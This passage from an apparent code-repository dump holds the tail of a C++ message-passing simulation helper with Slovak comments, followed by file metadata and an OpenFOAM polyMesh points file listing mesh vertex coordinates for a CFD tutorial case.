// zmaze zo spravy $
string clean(string str){
string res = "";
bool active = true;
For(i, str.size()) {
if (str[i]<32) continue;
if (str[i]=='$') active = false;
if (active) res+=str[i];
if (str[i]==' ') active = true;
}
return res;
}
}
// kazda prijata sprava sa ohlasi fuknciou 'func'
void setMessageListener(MFunc func){
details::mFunc = func;
}
// ked ma program zacat bezat, zavola sa 'func'
void setInitListener(IFunc func){
details::iFunc = func;
}
// posli spravu po porte 'port' s textom 'str'
// 'str' moze obsahovat len alfanumericke znaky a medzery
// s vyjnimkou ze viete, co robite
//
// nepovinny parameter 'color' nastavi sprave farbu
// priklad biela = 'FFFFFF'
void sendMessage(int port, const string &str, const string &color = ""){
printf("@ %d :", port);
// znak $ znamena, ze podplatime spravu aby nieco spravila
if (color.size()>0) printf(" $C%s", color.c_str());
printf(" %s\n", str.c_str());
fflush(stdout);
}
void sendInformation(const string &str){
printf("# %s\n",str.c_str());
fflush(stdout);
}
void algorithmUpdate(const string &str) {
printf("* %s\n",str.c_str());
fflush(stdout);
}
void pauseProgram() {
char c='%';
printf("%c\n",c);
fflush(stdout);
}
void exitProgram(string exitValue) {
printf("& %s\n",exitValue.c_str());
fflush(stdout);
}
/*
void sendVertexColorChange(const string &str) {
printf("+ %s\n",str.c_str());
fflush(stdout);
}
void sendVertexRadiusChange(const string &str) {
printf("_ %s\n",str.c_str());
fflush(stdout);
}
*/
// spusti pocuvanie
void run();
};
void Messager::run(){
using namespace details;
char ch;
string line;
char str[1047];
while(scanf("%c",&ch)>0) {
if (ch == '\n') {
continue;
}
else if(ch == '*') {
scanf("%s", str);
if (!strcmp(str,"ports")){
int portn, portid;
scanf(" : %d", &portn);
For(i,portn) {
scanf("%d", &portid);
Property::ports.push_back(portid);
}
} else if(!strcmp(str,"id")) {
int _id;
scanf(" : %d",&_id);
Property::id = _id;
} else if(!strcmp(str,"initvalue")) {
int _initvalue;
scanf(" : %d",&_initvalue);
Property::initvalue = _initvalue;
} else if (!strcmp(str,"start")){
iFunc();
}
readline();
}
else if(ch == '@') {
int port = -1;
scanf("%d : ", &port);
readline(&line);
line = clean(line);
mFunc(port, line);
}
else if(ch == '!') {
readline();
}
}
}
/////////////////////////////////
/*
using namespace Messager;
using namespace Property;
void recieve(int port, string message) {
while(rand()%2 || rand()%47==0){
int to = ports[rand()%ports.size()];
char buffer[100];
sprintf(buffer, "Hello %d", rand()%1000);
sendMessage(to, string(buffer));
}
}
void init(){
int to = ports[rand()%ports.size()];
char buffer[100];
sprintf(buffer, "Hello %d", rand()%1000);
sendMessage(to, string(buffer));
}
int main(){
srand(time(NULL)+getpid());
int randid = rand()%1000;
setInitListener(init);
setMessageListener(recieve);
run();
}
*/
|
7873fa5caddee94ec22dedd0e00107536c508b6a
|
188fb8ded33ad7a2f52f69975006bb38917437ef
|
/Fluid/processor4/0.54/polyMesh/points
|
ee8447edc5dbbabcf9a33e2b0e3f8ae629318394
|
[] |
no_license
|
abarcaortega/Tuto_2
|
34a4721f14725c20471ff2dc8d22b52638b8a2b3
|
4a84c22efbb9cd2eaeda92883343b6910e0941e2
|
refs/heads/master
| 2020-08-05T16:11:57.674940
| 2019-10-04T09:56:09
| 2019-10-04T09:56:09
| 212,573,883
| 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 24,946
|
points
|
/*--------------------------------*- C++ -*----------------------------------*\
| ========= | |
| \\ / F ield | OpenFOAM: The Open Source CFD Toolbox |
| \\ / O peration | Version: dev |
| \\ / A nd | Web: www.OpenFOAM.org |
| \\/ M anipulation | |
\*---------------------------------------------------------------------------*/
FoamFile
{
version 2.0;
format ascii;
class vectorField;
location "0.54/polyMesh";
object points;
}
// * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * //
1062
(
(-0.626341 0.3 0)
(-0.544917 0.3 0)
(-0.465813 0.3 0)
(-0.389018 0.3 0)
(-0.314551 0.3 0)
(-0.242468 0.3 0)
(-0.172866 0.3 0)
(-0.10578 0.3 0)
(-0.0398238 0.3 0)
(-0.05 0.3 0)
(-0.626138 0.3 0.0685506)
(-0.544647 0.3 0.0682036)
(-0.465445 0.3 0.0678676)
(-0.388501 0.3 0.0675593)
(-0.313787 0.3 0.067292)
(-0.241267 0.3 0.0670687)
(-0.170855 0.3 0.0668716)
(-0.10226 0.3 0.0666523)
(-0.0338726 0.3 0.0663726)
(0.100498 0.3 0.0645218)
(-0.625547 0.3 0.137199)
(-0.543867 0.3 0.136502)
(-0.464396 0.3 0.135824)
(-0.387054 0.3 0.1352)
(-0.311725 0.3 0.134663)
(-0.238216 0.3 0.134238)
(-0.16618 0.3 0.133945)
(-0.0950332 0.3 0.133806)
(-0.0237642 0.3 0.133855)
(0.0472993 0.3 0.139215)
(-0.624618 0.3 0.206054)
(-0.542664 0.3 0.204995)
(-0.46282 0.3 0.203953)
(-0.384964 0.3 0.202987)
(-0.308922 0.3 0.20215)
(-0.234437 0.3 0.201488)
(-0.161151 0.3 0.201042)
(-0.088712 0.3 0.200847)
(-0.0172829 0.3 0.200895)
(0.0535151 0.3 0.198035)
(-0.623436 0.3 0.275204)
(-0.541173 0.3 0.273761)
(-0.460943 0.3 0.272321)
(-0.382603 0.3 0.270967)
(-0.305974 0.3 0.269776)
(-0.230839 0.3 0.268811)
(-0.156986 0.3 0.268108)
(-0.0843536 0.3 0.267659)
(-0.013294 0.3 0.267418)
(0.0567258 0.3 0.27014)
(-0.622113 0.3 0.344709)
(-0.539551 0.3 0.342867)
(-0.458979 0.3 0.340994)
(-0.380263 0.3 0.339201)
(-0.303255 0.3 0.337601)
(-0.227812 0.3 0.336285)
(-0.153854 0.3 0.335293)
(-0.0814581 0.3 0.334591)
(-0.0109093 0.3 0.334089)
(0.0583621 0.3 0.330567)
(-0.620746 0.3 0.414656)
(-0.537918 0.3 0.412411)
(-0.457069 0.3 0.410075)
(-0.37809 0.3 0.407793)
(-0.300872 0.3 0.405722)
(-0.225336 0.3 0.404011)
(-0.151474 0.3 0.40276)
(-0.0793945 0.3 0.401986)
(-0.00927052 0.3 0.401623)
(0.0583007 0.3 0.401862)
(-0.619401 0.3 0.485183)
(-0.536343 0.3 0.482549)
(-0.455278 0.3 0.479726)
(-0.376123 0.3 0.476889)
(-0.2988 0.3 0.474252)
(-0.223259 0.3 0.47204)
(-0.149499 0.3 0.470441)
(-0.0775909 0.3 0.469544)
(-0.00761202 0.3 0.469279)
(0.0603949 0.3 0.471558)
(-0.618126 0.3 0.556458)
(-0.534866 0.3 0.553482)
(-0.453626 0.3 0.550169)
(-0.374346 0.3 0.546708)
(-0.296972 0.3 0.543366)
(-0.221455 0.3 0.540459)
(-0.147757 0.3 0.538282)
(-0.0758601 0.3 0.536991)
(-0.00577391 0.3 0.536459)
(0.0623656 0.3 0.533359)
(-0.616962 0.3 0.628657)
(-0.533517 0.3 0.625449)
(-0.452116 0.3 0.621697)
(-0.372732 0.3 0.617572)
(-0.295333 0.3 0.613367)
(-0.219874 0.3 0.609499)
(-0.146275 0.3 0.60644)
(-0.0744316 0.3 0.60456)
(-0.00430885 0.3 0.603854)
(0.0655526 0.3 0.606219)
(-0.615955 0.3 0.701936)
(-0.532327 0.3 0.698702)
(-0.450757 0.3 0.694674)
(-0.371248 0.3 0.689946)
(-0.293813 0.3 0.684772)
(-0.218444 0.3 0.679617)
(-0.145056 0.3 0.675162)
(-0.0734404 0.3 0.672166)
(-0.00335347 0.3 0.67105)
(0.0634547 0.3 0.669677)
(-0.61516 0.3 0.776367)
(-0.531349 0.3 0.773443)
(-0.449578 0.3 0.769478)
(-0.369874 0.3 0.764419)
(-0.29231 0.3 0.758361)
(-0.216983 0.3 0.751672)
(-0.143933 0.3 0.745101)
(-0.0729801 0.3 0.739796)
(-0.00361517 0.3 0.736933)
(0.0710949 0.3 0.742659)
(-0.614648 0.3 0.851985)
(-0.530667 0.3 0.849866)
(-0.44866 0.3 0.846586)
(-0.368639 0.3 0.841888)
(-0.290703 0.3 0.835564)
(-0.215076 0.3 0.827609)
(-0.142093 0.3 0.818474)
(-0.0719833 0.3 0.809454)
(-0.00434972 0.3 0.802741)
(0.054264 0.3 0.791999)
(-0.614489 0.3 0.928836)
(-0.5304 0.3 0.928213)
(-0.448184 0.3 0.926663)
(-0.367757 0.3 0.92387)
(-0.289062 0.3 0.919443)
(-0.212105 0.3 0.913049)
(-0.136957 0.3 0.904616)
(-0.063686 0.3 0.895038)
(0.00795148 0.3 0.885991)
(0.057762 0.3 0.859985)
(-0.614749 0.3 1.00673)
(-0.530696 0.3 1.00828)
(-0.448475 0.3 1.00962)
(-0.36792 0.3 1.01074)
(-0.288785 0.3 1.01161)
(-0.210712 0.3 1.01223)
(-0.133204 0.3 1.01242)
(-0.0557458 0.3 1.01167)
(0.0218249 0.3 1.00897)
(0.140595 0.3 0.964232)
(-0.615431 0.3 1.08484)
(-0.531595 0.3 1.08869)
(-0.449697 0.3 1.09313)
(-0.369637 0.3 1.09848)
(-0.291305 0.3 1.10513)
(-0.214588 0.3 1.11342)
(-0.139419 0.3 1.12324)
(-0.0657739 0.3 1.13332)
(0.00607962 0.3 1.1415)
(0.0607465 0.3 1.21067)
(-0.626341 0 0)
(-0.544917 0 0)
(-0.465813 0 0)
(-0.389018 0 0)
(-0.314551 0 0)
(-0.242468 0 0)
(-0.172866 0 0)
(-0.10578 0 0)
(-0.0398238 0 0)
(-0.05 0 0)
(-0.626138 0 0.0685506)
(-0.544647 0 0.0682036)
(-0.465445 0 0.0678676)
(-0.388501 0 0.0675593)
(-0.313787 0 0.067292)
(-0.241267 0 0.0670687)
(-0.170855 0 0.0668716)
(-0.10226 0 0.0666523)
(-0.0338726 0 0.0663726)
(0.100498 0 0.0645218)
(-0.625547 0 0.137199)
(-0.543867 0 0.136502)
(-0.464396 0 0.135824)
(-0.387054 0 0.1352)
(-0.311725 0 0.134663)
(-0.238216 0 0.134238)
(-0.16618 0 0.133945)
(-0.0950332 0 0.133806)
(-0.0237642 0 0.133855)
(0.0472993 0 0.139215)
(-0.624618 0 0.206054)
(-0.542664 0 0.204995)
(-0.46282 0 0.203953)
(-0.384964 0 0.202987)
(-0.308922 0 0.20215)
(-0.234437 0 0.201488)
(-0.161151 0 0.201042)
(-0.088712 0 0.200847)
(-0.0172829 0 0.200895)
(0.0535151 0 0.198035)
(-0.623436 0 0.275204)
(-0.541173 0 0.273761)
(-0.460943 0 0.272321)
(-0.382603 0 0.270967)
(-0.305974 0 0.269776)
(-0.230839 0 0.268811)
(-0.156986 0 0.268108)
(-0.0843536 0 0.267659)
(-0.013294 0 0.267418)
(0.0567258 0 0.27014)
(-0.622113 0 0.344709)
(-0.539551 0 0.342867)
(-0.458979 0 0.340994)
(-0.380263 0 0.339201)
(-0.303255 0 0.337601)
(-0.227812 0 0.336285)
(-0.153854 0 0.335293)
(-0.0814581 0 0.334591)
(-0.0109093 0 0.334089)
(0.0583621 0 0.330567)
(-0.620746 0 0.414656)
(-0.537918 0 0.412411)
(-0.457069 0 0.410075)
(-0.37809 0 0.407793)
(-0.300872 0 0.405722)
(-0.225336 0 0.404011)
(-0.151474 0 0.40276)
(-0.0793945 0 0.401986)
(-0.00927052 0 0.401623)
(0.0583007 0 0.401862)
(-0.619401 0 0.485183)
(-0.536343 0 0.482549)
(-0.455278 0 0.479726)
(-0.376123 0 0.476889)
(-0.2988 0 0.474252)
(-0.223259 0 0.47204)
(-0.149499 0 0.470441)
(-0.0775909 0 0.469544)
(-0.00761202 0 0.469279)
(0.0603949 0 0.471558)
(-0.618126 0 0.556458)
(-0.534866 0 0.553482)
(-0.453626 0 0.550169)
(-0.374346 0 0.546708)
(-0.296972 0 0.543366)
(-0.221455 0 0.540459)
(-0.147757 0 0.538282)
(-0.0758601 0 0.536991)
(-0.00577391 0 0.536459)
(0.0623656 0 0.533359)
(-0.616962 0 0.628657)
(-0.533517 0 0.625449)
(-0.452116 0 0.621697)
(-0.372732 0 0.617572)
(-0.295333 0 0.613367)
(-0.219874 0 0.609499)
(-0.146275 0 0.60644)
(-0.0744316 0 0.60456)
(-0.00430885 0 0.603854)
(0.0655526 0 0.606219)
(-0.615955 0 0.701936)
(-0.532327 0 0.698702)
(-0.450757 0 0.694674)
(-0.371248 0 0.689946)
(-0.293813 0 0.684772)
(-0.218444 0 0.679617)
(-0.145056 0 0.675162)
(-0.0734404 0 0.672166)
(-0.00335347 0 0.67105)
(0.0634547 0 0.669677)
(-0.61516 0 0.776367)
(-0.531349 0 0.773443)
(-0.449578 0 0.769478)
(-0.369874 0 0.764419)
(-0.29231 0 0.758361)
(-0.216983 0 0.751672)
(-0.143933 0 0.745101)
(-0.0729801 0 0.739796)
(-0.00361517 0 0.736933)
(0.0710949 0 0.742659)
(-0.614648 0 0.851985)
(-0.530667 0 0.849866)
(-0.44866 0 0.846586)
(-0.368639 0 0.841888)
(-0.290703 0 0.835564)
(-0.215076 0 0.827609)
(-0.142093 0 0.818474)
(-0.0719833 0 0.809454)
(-0.00434972 0 0.802741)
(0.054264 0 0.791999)
(-0.614489 0 0.928836)
(-0.5304 0 0.928213)
(-0.448184 0 0.926663)
(-0.367757 0 0.92387)
(-0.289062 0 0.919443)
(-0.212105 0 0.913049)
(-0.136957 0 0.904616)
(-0.063686 0 0.895038)
(0.00795148 0 0.885991)
(0.057762 0 0.859985)
(-0.614749 0 1.00673)
(-0.530696 0 1.00828)
(-0.448475 0 1.00962)
(-0.36792 0 1.01074)
(-0.288785 0 1.01161)
(-0.210712 0 1.01223)
(-0.133204 0 1.01242)
(-0.0557458 0 1.01167)
(0.0218249 0 1.00897)
(0.140595 0 0.964232)
(-0.615431 0 1.08484)
(-0.531595 0 1.08869)
(-0.449697 0 1.09313)
(-0.369637 0 1.09848)
(-0.291305 0 1.10513)
(-0.214588 0 1.11342)
(-0.139419 0 1.12324)
(-0.0657739 0 1.13332)
(0.00607962 0 1.1415)
(0.0607465 0 1.21067)
(0.05 0.3 0)
(0.193638 0.3 0)
(0.275849 0.3 0)
(0.352878 0.3 0)
(0.428698 0.3 0)
(0.505073 0.3 0)
(0.58265 0.3 0)
(0.661695 0.3 0)
(0.742339 0.3 0)
(0.824661 0.3 0)
(0.908719 0.3 0)
(0.175653 0.3 0.0455037)
(0.207351 0.3 0.0608579)
(0.281492 0.3 0.0629441)
(0.355086 0.3 0.0648126)
(0.429623 0.3 0.0659052)
(0.505516 0.3 0.0665851)
(0.582895 0.3 0.0670697)
(0.661846 0.3 0.0674681)
(0.742439 0.3 0.067827)
(0.824729 0.3 0.068161)
(0.908766 0.3 0.06847)
(0.143507 0.3 0.136033)
(0.220205 0.3 0.128808)
(0.287834 0.3 0.130054)
(0.358268 0.3 0.131479)
(0.431328 0.3 0.132641)
(0.506503 0.3 0.133563)
(0.58351 0.3 0.134348)
(0.662253 0.3 0.135066)
(0.742717 0.3 0.13575)
(0.824922 0.3 0.136402)
(0.908899 0.3 0.137011)
(0.153254 0.3 0.200766)
(0.219788 0.3 0.198953)
(0.289009 0.3 0.198863)
(0.359874 0.3 0.199348)
(0.432733 0.3 0.200112)
(0.507573 0.3 0.200988)
(0.584291 0.3 0.201919)
(0.662817 0.3 0.202883)
(0.743123 0.3 0.203857)
(0.82521 0.3 0.204809)
(0.909099 0.3 0.205704)
(0.150973 0.3 0.268014)
(0.220078 0.3 0.267359)
(0.289775 0.3 0.267161)
(0.360976 0.3 0.267316)
(0.433873 0.3 0.267859)
(0.508576 0.3 0.268703)
(0.585105 0.3 0.269762)
(0.663447 0.3 0.270954)
(0.743595 0.3 0.272207)
(0.825555 0.3 0.273448)
(0.909342 0.3 0.274618)
(0.150993 0.3 0.334995)
(0.220866 0.3 0.334963)
(0.290657 0.3 0.334919)
(0.361957 0.3 0.335099)
(0.434867 0.3 0.335652)
(0.509489 0.3 0.33659)
(0.585883 0.3 0.337841)
(0.664075 0.3 0.339297)
(0.74408 0.3 0.340844)
(0.825913 0.3 0.342376)
(0.909594 0.3 0.343807)
(0.156339 0.3 0.402355)
(0.222156 0.3 0.40239)
(0.291735 0.3 0.402448)
(0.362938 0.3 0.402734)
(0.435782 0.3 0.403441)
(0.510316 0.3 0.404612)
(0.586594 0.3 0.406163)
(0.664656 0.3 0.407953)
(0.744531 0.3 0.409827)
(0.826247 0.3 0.411654)
(0.909826 0.3 0.41333)
(0.154172 0.3 0.469561)
(0.223039 0.3 0.469855)
(0.292657 0.3 0.469874)
(0.363826 0.3 0.470271)
(0.4366 0.3 0.471259)
(0.511042 0.3 0.472824)
(0.58721 0.3 0.474811)
(0.665155 0.3 0.47702)
(0.744915 0.3 0.479259)
(0.826523 0.3 0.481378)
(0.910009 0.3 0.483268)
(0.154879 0.3 0.538025)
(0.223994 0.3 0.537217)
(0.293549 0.3 0.537059)
(0.36463 0.3 0.537678)
(0.437306 0.3 0.539177)
(0.511645 0.3 0.541361)
(0.587706 0.3 0.543945)
(0.665542 0.3 0.546658)
(0.745198 0.3 0.549281)
(0.826713 0.3 0.551662)
(0.910118 0.3 0.553709)
(0.159638 0.3 0.607497)
(0.224979 0.3 0.603233)
(0.294349 0.3 0.603497)
(0.365291 0.3 0.604924)
(0.437854 0.3 0.607393)
(0.512086 0.3 0.610496)
(0.588044 0.3 0.613833)
(0.665782 0.3 0.617092)
(0.74535 0.3 0.620064)
(0.826789 0.3 0.62263)
(0.910131 0.3 0.624736)
(0.155453 0.3 0.664949)
(0.225448 0.3 0.667764)
(0.294811 0.3 0.669438)
(0.365696 0.3 0.672517)
(0.438178 0.3 0.676488)
(0.512317 0.3 0.680767)
(0.588182 0.3 0.68491)
(0.665838 0.3 0.688643)
(0.745339 0.3 0.691828)
(0.826725 0.3 0.69442)
(0.910026 0.3 0.69643)
(0.159972 0.3 0.731853)
(0.225676 0.3 0.732649)
(0.294976 0.3 0.7365)
(0.365826 0.3 0.741853)
(0.438239 0.3 0.747594)
(0.512291 0.3 0.753012)
(0.588077 0.3 0.757747)
(0.665674 0.3 0.761668)
(0.745137 0.3 0.764777)
(0.8265 0.3 0.767138)
(0.909789 0.3 0.768835)
(0.159319 0.3 0.788189)
(0.224854 0.3 0.801428)
(0.294703 0.3 0.808085)
(0.365654 0.3 0.815512)
(0.437989 0.3 0.822436)
(0.511945 0.3 0.828274)
(0.587672 0.3 0.832912)
(0.66525 0.3 0.836437)
(0.744719 0.3 0.839008)
(0.826102 0.3 0.840784)
(0.909414 0.3 0.841907)
(0.141209 0.3 0.861634)
(0.225843 0.3 0.879978)
(0.295049 0.3 0.888761)
(0.365376 0.3 0.896407)
(0.437353 0.3 0.902651)
(0.511173 0.3 0.907346)
(0.586895 0.3 0.910702)
(0.664528 0.3 0.912989)
(0.744071 0.3 0.914441)
(0.825527 0.3 0.915242)
(0.908903 0.3 0.915525)
(0.182897 0.3 0.966201)
(0.224457 0.3 0.985421)
(0.293453 0.3 0.98592)
(0.363623 0.3 0.987607)
(0.435679 0.3 0.989226)
(0.509697 0.3 0.990339)
(0.585644 0.3 0.990924)
(0.663483 0.3 0.991063)
(0.743197 0.3 0.99084)
(0.824787 0.3 0.990316)
(0.908267 0.3 0.989537)
(0.122912 0.3 1.14572)
(0.214313 0.3 1.10987)
(0.286597 0.3 1.09499)
(0.359052 0.3 1.08576)
(0.432531 0.3 1.07977)
(0.507435 0.3 1.07562)
(0.583948 0.3 1.0725)
(0.662163 0.3 1.06996)
(0.742137 0.3 1.06776)
(0.823913 0.3 1.06572)
(0.907527 0.3 1.06376)
(0.05 0 0)
(0.193638 0 0)
(0.275849 0 0)
(0.352878 0 0)
(0.428698 0 0)
(0.505073 0 0)
(0.58265 0 0)
(0.661695 0 0)
(0.742339 0 0)
(0.824661 0 0)
(0.908719 0 0)
(0.175653 0 0.0455037)
(0.207351 0 0.0608579)
(0.281492 0 0.0629441)
(0.355086 0 0.0648126)
(0.429623 0 0.0659052)
(0.505516 0 0.0665851)
(0.582895 0 0.0670697)
(0.661846 0 0.0674681)
(0.742439 0 0.067827)
(0.824729 0 0.068161)
(0.908766 0 0.06847)
(0.143507 0 0.136033)
(0.220205 0 0.128808)
(0.287834 0 0.130054)
(0.358268 0 0.131479)
(0.431328 0 0.132641)
(0.506503 0 0.133563)
(0.58351 0 0.134348)
(0.662253 0 0.135066)
(0.742717 0 0.13575)
(0.824922 0 0.136402)
(0.908899 0 0.137011)
(0.153254 0 0.200766)
(0.219788 0 0.198953)
(0.289009 0 0.198863)
(0.359874 0 0.199348)
(0.432733 0 0.200112)
(0.507573 0 0.200988)
(0.584291 0 0.201919)
(0.662817 0 0.202883)
(0.743123 0 0.203857)
(0.82521 0 0.204809)
(0.909099 0 0.205704)
(0.150973 0 0.268014)
(0.220078 0 0.267359)
(0.289775 0 0.267161)
(0.360976 0 0.267316)
(0.433873 0 0.267859)
(0.508576 0 0.268703)
(0.585105 0 0.269762)
(0.663447 0 0.270954)
(0.743595 0 0.272207)
(0.825555 0 0.273448)
(0.909342 0 0.274618)
(0.150993 0 0.334995)
(0.220866 0 0.334963)
(0.290657 0 0.334919)
(0.361957 0 0.335099)
(0.434867 0 0.335652)
(0.509489 0 0.33659)
(0.585883 0 0.337841)
(0.664075 0 0.339297)
(0.74408 0 0.340844)
(0.825913 0 0.342376)
(0.909594 0 0.343807)
(0.156339 0 0.402355)
(0.222156 0 0.40239)
(0.291735 0 0.402448)
(0.362938 0 0.402734)
(0.435782 0 0.403441)
(0.510316 0 0.404612)
(0.586594 0 0.406163)
(0.664656 0 0.407953)
(0.744531 0 0.409827)
(0.826247 0 0.411654)
(0.909826 0 0.41333)
(0.154172 0 0.469561)
(0.223039 0 0.469855)
(0.292657 0 0.469874)
(0.363826 0 0.470271)
(0.4366 0 0.471259)
(0.511042 0 0.472824)
(0.58721 0 0.474811)
(0.665155 0 0.47702)
(0.744915 0 0.479259)
(0.826523 0 0.481378)
(0.910009 0 0.483268)
(0.154879 0 0.538025)
(0.223994 0 0.537217)
(0.293549 0 0.537059)
(0.36463 0 0.537678)
(0.437306 0 0.539177)
(0.511645 0 0.541361)
(0.587706 0 0.543945)
(0.665542 0 0.546658)
(0.745198 0 0.549281)
(0.826713 0 0.551662)
(0.910118 0 0.553709)
(0.159638 0 0.607497)
(0.224979 0 0.603233)
(0.294349 0 0.603497)
(0.365291 0 0.604924)
(0.437854 0 0.607393)
(0.512086 0 0.610496)
(0.588044 0 0.613833)
(0.665782 0 0.617092)
(0.74535 0 0.620064)
(0.826789 0 0.62263)
(0.910131 0 0.624736)
(0.155453 0 0.664949)
(0.225448 0 0.667764)
(0.294811 0 0.669438)
(0.365696 0 0.672517)
(0.438178 0 0.676488)
(0.512317 0 0.680767)
(0.588182 0 0.68491)
(0.665838 0 0.688643)
(0.745339 0 0.691828)
(0.826725 0 0.69442)
(0.910026 0 0.69643)
(0.159972 0 0.731853)
(0.225676 0 0.732649)
(0.294976 0 0.7365)
(0.365826 0 0.741853)
(0.438239 0 0.747594)
(0.512291 0 0.753012)
(0.588077 0 0.757747)
(0.665674 0 0.761668)
(0.745137 0 0.764777)
(0.8265 0 0.767138)
(0.909789 0 0.768835)
(0.159319 0 0.788189)
(0.224854 0 0.801428)
(0.294703 0 0.808085)
(0.365654 0 0.815512)
(0.437989 0 0.822436)
(0.511945 0 0.828274)
(0.587672 0 0.832912)
(0.66525 0 0.836437)
(0.744719 0 0.839008)
(0.826102 0 0.840784)
(0.909414 0 0.841907)
(0.141209 0 0.861634)
(0.225843 0 0.879978)
(0.295049 0 0.888761)
(0.365376 0 0.896407)
(0.437353 0 0.902651)
(0.511173 0 0.907346)
(0.586895 0 0.910702)
(0.664528 0 0.912989)
(0.744071 0 0.914441)
(0.825527 0 0.915242)
(0.908903 0 0.915525)
(0.182897 0 0.966201)
(0.224457 0 0.985421)
(0.293453 0 0.98592)
(0.363623 0 0.987607)
(0.435679 0 0.989226)
(0.509697 0 0.990339)
(0.585644 0 0.990924)
(0.663483 0 0.991063)
(0.743197 0 0.99084)
(0.824787 0 0.990316)
(0.908267 0 0.989537)
(0.122912 0 1.14572)
(0.214313 0 1.10987)
(0.286597 0 1.09499)
(0.359052 0 1.08576)
(0.432531 0 1.07977)
(0.507435 0 1.07562)
(0.583948 0 1.0725)
(0.662163 0 1.06996)
(0.742137 0 1.06776)
(0.823913 0 1.06572)
(0.907527 0 1.06376)
(-0.616441 0.3 1.16448)
(-0.532932 0.3 1.17004)
(-0.451526 0.3 1.17655)
(-0.372235 0.3 1.18429)
(-0.295144 0.3 1.19351)
(-0.22044 0.3 1.20425)
(-0.148421 0.3 1.21611)
(-0.0793317 0.3 1.22802)
(-0.0135027 0.3 1.23876)
(0.0472935 0.3 1.24835)
(-0.61765 0.3 1.24405)
(-0.534467 0.3 1.25051)
(-0.453498 0.3 1.25782)
(-0.374785 0.3 1.26607)
(-0.298408 0.3 1.27523)
(-0.224485 0.3 1.285)
(-0.153119 0.3 1.2948)
(-0.0843397 0.3 1.30381)
(-0.0181529 0.3 1.31127)
(0.0454837 0.3 1.31634)
(-0.618948 0.3 1.32352)
(-0.536027 0.3 1.33025)
(-0.455368 0.3 1.33757)
(-0.376991 0.3 1.34544)
(-0.300928 0.3 1.35368)
(-0.227202 0.3 1.36192)
(-0.155809 0.3 1.3697)
(-0.0866928 0.3 1.37644)
(-0.0197936 0.3 1.38161)
(0.0453887 0.3 1.38427)
(-0.620259 0.3 1.40307)
(-0.537524 0.3 1.40967)
(-0.457055 0.3 1.41661)
(-0.378843 0.3 1.42377)
(-0.302877 0.3 1.43092)
(-0.229129 0.3 1.43777)
(-0.157546 0.3 1.44393)
(-0.0880405 0.3 1.44901)
(-0.0204957 0.3 1.45259)
(0.045581 0.3 1.45406)
(-0.538924 0.3 1.48922)
(-0.458555 0.3 1.49561)
(-0.3804 0.3 1.50197)
(-0.304421 0.3 1.50811)
(-0.230563 0.3 1.51377)
(-0.158752 0.3 1.51868)
(-0.0888874 0.3 1.52255)
(-0.020837 0.3 1.52507)
(0.0457874 0.3 1.52592)
(-0.38173 0.3 1.58066)
(-0.305684 0.3 1.58591)
(-0.231686 0.3 1.5906)
(-0.159653 0.3 1.59455)
(-0.0894842 0.3 1.59753)
(-0.0210572 0.3 1.59935)
(0.045922 0.3 1.59985)
(-0.232615 0.3 1.66866)
(-0.160384 0.3 1.67186)
(-0.089969 0.3 1.6742)
(-0.0212639 0.3 1.67555)
(0.045957 0.3 1.67585)
(-0.0904188 0.3 1.75269)
(-0.0215067 0.3 1.75371)
(0.0458853 0.3 1.7539)
(-0.616441 0 1.16448)
(-0.532932 0 1.17004)
(-0.451526 0 1.17655)
(-0.372235 0 1.18429)
(-0.295144 0 1.19351)
(-0.22044 0 1.20425)
(-0.148421 0 1.21611)
(-0.0793317 0 1.22802)
(-0.0135027 0 1.23876)
(0.0472935 0 1.24835)
(-0.61765 0 1.24405)
(-0.534467 0 1.25051)
(-0.453498 0 1.25782)
(-0.374785 0 1.26607)
(-0.298408 0 1.27523)
(-0.224485 0 1.285)
(-0.153119 0 1.2948)
(-0.0843397 0 1.30381)
(-0.0181529 0 1.31127)
(0.0454837 0 1.31634)
(-0.618948 0 1.32352)
(-0.536027 0 1.33025)
(-0.455368 0 1.33757)
(-0.376991 0 1.34544)
(-0.300928 0 1.35368)
(-0.227202 0 1.36192)
(-0.155809 0 1.3697)
(-0.0866928 0 1.37644)
(-0.0197936 0 1.38161)
(0.0453887 0 1.38427)
(-0.620259 0 1.40307)
(-0.537524 0 1.40967)
(-0.457055 0 1.41661)
(-0.378843 0 1.42377)
(-0.302877 0 1.43092)
(-0.229129 0 1.43777)
(-0.157546 0 1.44393)
(-0.0880405 0 1.44901)
(-0.0204957 0 1.45259)
(0.045581 0 1.45406)
(-0.538924 0 1.48922)
(-0.458555 0 1.49561)
(-0.3804 0 1.50197)
(-0.304421 0 1.50811)
(-0.230563 0 1.51377)
(-0.158752 0 1.51868)
(-0.0888874 0 1.52255)
(-0.020837 0 1.52507)
(0.0457874 0 1.52592)
(-0.38173 0 1.58066)
(-0.305684 0 1.58591)
(-0.231686 0 1.5906)
(-0.159653 0 1.59455)
(-0.0894842 0 1.59753)
(-0.0210572 0 1.59935)
(0.045922 0 1.59985)
(-0.232615 0 1.66866)
(-0.160384 0 1.67186)
(-0.089969 0 1.6742)
(-0.0212639 0 1.67555)
(0.045957 0 1.67585)
(-0.0904188 0 1.75269)
(-0.0215067 0 1.75371)
(0.0458853 0 1.7539)
(0.0712196 0.3 1.21234)
(0.0907398 0.3 1.1885)
(0.0735998 0.3 1.25307)
(0.102847 0.3 1.24923)
(0.135573 0.3 1.23611)
(0.0752503 0.3 1.31787)
(0.106534 0.3 1.31593)
(0.138756 0.3 1.30983)
(0.0766758 0.3 1.3845)
(0.108738 0.3 1.38328)
(0.141057 0.3 1.37989)
(0.0775957 0.3 1.45388)
(0.110053 0.3 1.45295)
(0.142561 0.3 1.45071)
(0.07819 0.3 1.52562)
(0.110878 0.3 1.52486)
(0.14355 0.3 1.52322)
(0.0785561 0.3 1.59953)
(0.111391 0.3 1.5989)
(0.144187 0.3 1.59762)
(0.0787424 0.3 1.67554)
(0.111676 0.3 1.67501)
(0.144564 0.3 1.67397)
(0.0787757 0.3 1.75362)
(0.11178 0.3 1.75316)
(0.144736 0.3 1.7523)
(0.0786756 0.3 1.83373)
(0.111732 0.3 1.83334)
(0.144739 0.3 1.83261)
(0.0712196 0 1.21234)
(0.0907398 0 1.1885)
(0.0735998 0 1.25307)
(0.102847 0 1.24923)
(0.135573 0 1.23611)
(0.0752503 0 1.31787)
(0.106534 0 1.31593)
(0.138756 0 1.30983)
(0.0766758 0 1.3845)
(0.108738 0 1.38328)
(0.141057 0 1.37989)
(0.0775957 0 1.45388)
(0.110053 0 1.45295)
(0.142561 0 1.45071)
